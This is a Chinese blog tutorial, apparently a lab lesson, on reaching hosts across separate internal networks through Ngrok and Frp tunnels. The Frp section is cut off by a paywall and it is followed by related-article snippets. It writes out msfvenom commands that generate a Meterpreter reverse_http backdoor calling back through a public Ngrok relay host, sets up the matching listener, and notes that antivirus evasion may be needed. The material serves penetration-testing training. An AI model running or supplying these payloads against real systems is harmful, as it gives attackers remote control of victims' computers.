第70天-内网安全-域横向内网漫游 Socks 代理隧道技

内网穿透与安全测试实践
最新推荐文章于 2025-10-22 17:27:15 发布
原创 最新推荐文章于 2025-10-22 17:27:15 发布 · 1.6k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #linux #web安全

本文详细介绍了内网穿透技术,包括Ngrok和Frp的使用,以及内网穿透代理隧道技术在多层内网环境下的应用。通过实例演示了如何在不同内网之间建立通信,并利用Metasploit进行渗透测试,展示了从信息收集、漏洞利用到权限提升的完整过程。同时,文章还涉及了网络安全测试中的SQL注入、MS17010漏洞利用等常见攻击手段。

思维导图

基础知识点

1.内外网简单知识

  • 内网ip地址是私有ip地址(10/8, 172.16/12 , 192.168/16),除此之外就是外网ip。

2.内网1和内网2通信问题

  • 两个不同的内网的主机想要通过CS或者MSF等工具实现控制或者通讯是不可能的,必须要借助代理。

3.正反向协议通信连接问题

  • 正向:攻击者去连接受害者
    • 攻击者处于内网受害者处于外网
  • 反向:受害者去连接攻击者
    • 攻击者处于外网受害者处于内网
  • 为什么要区分正向和反向?
  • 因为如果控制端是外网主机(103.12.4.11),被控端是内网主机(192.168.23.36),内网被控端,通过控制端主动去找是找不到的,因为这个内网的IP地址并不是唯一的,可能很多内网都用了这个IP地址,你根本没法找。此时就需要反向连接了,让内网的被控端主动去找外网的控制端。

4.内网穿透代理隧道技术说明

  • 代理主要解决网络的连通性问题
  • 隧道主要解决流量分析工具、流量监控工具、防火墙等相关工具的过滤问题

演示案例:

1-内网穿透 Ngrok 测试演示-两个内网通讯上线

实验拓扑

Ngrok

国外:https://ngrok.com

国内:https://www.ngrok.cc/

1、注册登录
2、下载相应版本客户端

linux查看系统位数—uname -m

70-4

3、开通隧道

4、配置本地端口

(虚拟机kali的)

实验开始

协议:http 本地端口:192.168.80.137:4444

测试:内网win7 执行后门—免费主机处理—内网 kali 监听—内网 kali 接受器

./sunny clientid 隧道号
msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o test.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.80.137
set lport 4444
exploit
1、将Ngrok客户端传到 kali上,启动
./sunny clientid 隧道号

2、msf生成后门
msfvenom -p windows/meterpreter/reverse_http lhost=liandy.free.idcfengye.com lport=80 -f exe -o test.exe

3、配置并监听(一旦liandy.free.idcfengye.com有流量,就发给本地192.168.80.136:4444)

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.80.137
set lport 4444
exploit

4、在windows7运行test.exe

一直没出结果,test运行一会儿,进程就停止了。可能需要做免杀,不过无伤大雅!

  • 就是通过外网服务器做个桥梁,双方都能访问到,从而建立连接。

2-内网穿透 Frp 自建跳板测试-两个内网通讯上线

实验拓扑图

70-1

1.服务端-下载-解压-修改-启动(云主机记得修改安全组配置出入口

服务器修改配置文件 frps.ini:
[common
最低0.47元/天 解锁文章
内网安全-横向内网漫游Socks代理隧道
xhscxj的博客
03-20 2647
因为是两个局网 当你用kali生成一个后门文件放到目标主机 设置后门的反弹地址时,设置为你的外网地址时,后们会将信息反弹到你的路由器上 设置为内网地址时,又找不到你
内网安全学习(六)—横向-内网漫游: Socks 代理
qi_SJQ_的博客
02-17 1344
内网安全-横向内网漫游 Socks 代理隧道术 1.前置知识: 1)正向与反向连接: 正向就是你去连接被控主机,但由于机器处于内网内,分配的内网ip,无法直接找到,所以需要方向连接,即让主机连接我们的服务器公网ip。 2)内网穿透代理隧道术: 隧道是为了解决流量分析/检测工具/防火墙等工具的过滤问题,而代理是为了解决网络连通性问题。 2.内网穿透Ngrok工具开通隧道—两个内网通讯上线: 首先去ngrok上买个免费的服务隧道,自行修改ip与端口,之后会映射到此ip与端口: 然后打开客户
70内网安全-横向内网漫游Socks代理隧道术1
08-03
1.内外网简单知识 2.内网 1 和内网 2 通信问题 3.正向反向协议通信连接问题 4.内网穿透代理隧道术说明 2.测试:内网 1 执行后门-免费主机处理-
手把手教你打造CTF动态靶场(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
A1_3_9_7的博客
10-22 569
公司想搞一个CTF比赛,需要一个竞赛靶场,于是这个任务就落在了我的身上,平台是利用CTFd框架,基于docker搭建的动态靶场,搭建过程中遇到的坑比较多,这里我会把每一个遇到的坑都指出来。我搭建的是CTFd的3.X的版本。
CFS三层靶机-内网渗透
b1n的博客
08-29 726
我们已经知道CentOS 7还有55网段的ip,但是用nmap直接扫是扫不出来的,因为这里扫描是用的kali的ip扫描,模拟的环境中kali和centos是公网主机,所以可以直接扫到,而现在扫的属于内网网段,但CentOS即属于公网也属于内网,那就可以用他来渗透内网,这里使用msf自带的探测网络接口的模块(get_local_subnets)和查看路由的模块(autoroute -p)通过蚂剑的虚拟终端去查看一下CentOS的网卡信息发现还有一个55网段的内网ip,话不多说,继续干。
横向移动:Socks 代理 || 本地代理 术.
网络安全领域___专研者.
06-12 8198
Socks 代理又称全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080.
frp多层socks代理+端口映射
PANDA墨森的博客
06-12 7181
一、首先在公网上配置服务端(frps.ini) [common] bind_addr = xx.xx.xx.xx #公网vps的ip bind_port = 7000 二、配置客户端frpc. ini [common] server_addr = xx.xx.xx.xx#公网vps的ip server_port = 7000 #这里的端口要跟服务端的一样 [msf] type = tcp local_ip = 本机ip local_port = 55...
70内网安全-横向内网漫游Socks代理隧道术(下)
ALLEN'Blog
04-08 730
这节课解决代理的问题,他是内网里面的穿透术,隧道主要安全设备和流量监控的拦截问题,我们在做渗透的时候需要回显数据或者一些重要的信息,走的协议不一样,tcp/ip有七层,在不同层里面有不同的协议,有一些协议会受到防火墙,过滤设备和流量检测工具的干扰,在内网回显数据和拖数据的会出现一些拦截和告警,隧道术主要就是解决这个事情;两个肉鸡都在内网,就必须借助代理才能实现,代理利用工具比较知名的比如,frp,ngrok,ew,不过ew已经停止更新了,以后就用不到了,代理主要结局的问题,内网里面的主机有外网。
CFS三层靶机搭建及其内网渗透
..
07-05 8323
CFS三层靶机搭建及其内网渗透,附靶场环境
多重内网靶场
weixin_52240463的博客
01-23 3049
teamssix多重内网靶场
MSF 下内渗透
A_991128a的博客
03-15 419
先获取内机器sessionrun get_local_subnets //获取本地网络子网掩码route add 192.168.233.0 255.255.255.0 1 //添加路由表run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一条静态路由run autoroute -s 192.168.2.0/24 //添加动态路由route print //打印路由表。
红日内网渗透靶场1
weixin_47781572的博客
10-10 2459
官方下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
内网渗透之跨路由访问
qq_56426046的博客
11-16 1474
在渗透测试过程中,经常拿到web主机与数据库不同在一个网段,可以得出这台主机还连着一个内网, 如果想要继续渗透内网,可以把这台web主机当作跳板机,对内网进行渗透。kali无法直接访问目标主机 但是kali获取受害者的权限 得知可以访问目标主机,所以可以通过受害者做 跳板访问目标主机 获取内网网卡命令。msf使用隧道模块 默认是使用socks5 也可以选择socks4a。绑定路由 不绑定路由就没法访问目标主机。使用代理隧道nmap扫描内网主机。末将于禁,愿为曹家世代赴汤蹈火。msf 使用代理访问目标。
自主搭建的三层网络渗透靶场打靶记录
Innocence_0的博客
08-01 1207
假期马上结束了,闲暇之时我自己尝试着搭建了一个内网渗透的靶场靶场是根据比较新的漏洞进行搭建的,质量自以为还可以。文中若有不当之处还请各位大佬多多点评公众号:WHOAMIAnony整个靶场的网络环境分为三层。从最初的信息收集、外网初探、攻入内网、搭建代理横向移动,最终拿下控。端口扫描端口服务识别漏洞搜索与利用Laravel Debug mode RCE(CVE-2021-3129)漏洞利用Docker逃逸通达OA v11.3 漏洞利用Linux环境变量提权Redis 未授权访问漏洞。
Meterpreter命令详解
eli的博客
05-18 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获.
【VulnHub靶场】——CFS三层靶机内网渗透实操
Demo不是emo的博客
08-07 1万+
CFS三层靶场实操
CFS内网渗透三层内网漫游靶场-2019某CTF案例
weixin_60329395的博客
07-26 2864
CFS三层内网漫游-2019某CTF案例
什么是内网、外网?内网、外网有啥区别?
热门推荐
自学吧
02-28 2万+
之前有朋友问我,电脑如何上外网?他们有些是在学校的机房里,有些是在企业办公室里上网的,这个问题问的,我也是很头痛啊! 原因是:学校为了让学生上课的时候,不会上外网做其他事,一般会把外网关掉,不允许机房电脑连外网,所以你要上外网,找老师去吧。企业为了安全考虑,担心员工把企业内部的资料泄露出去,他们会把外网关闭,甚至把电脑机箱锁上,而且电脑机箱都是没有USB接口的,这样员工就算想盗取资料,也没辙了,除非过目不忘,都背下来! 不过也有些企业会开放外网,但是为了安全考虑,在外网的网关处做了信息过滤、安全监控,一旦发
simple-proxy-agent: 使用HTTP/SOCKS代理实现HTTP/HTTPS流量转发
示例中演示了如何使用simple-proxy-agent创建一个新的代理实例,并将该实例传递给fetch函数作为配置选项中的agent参数,从而实现通过代理发送请求。 ```javascript const fetch = require('node-fetch'); const ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值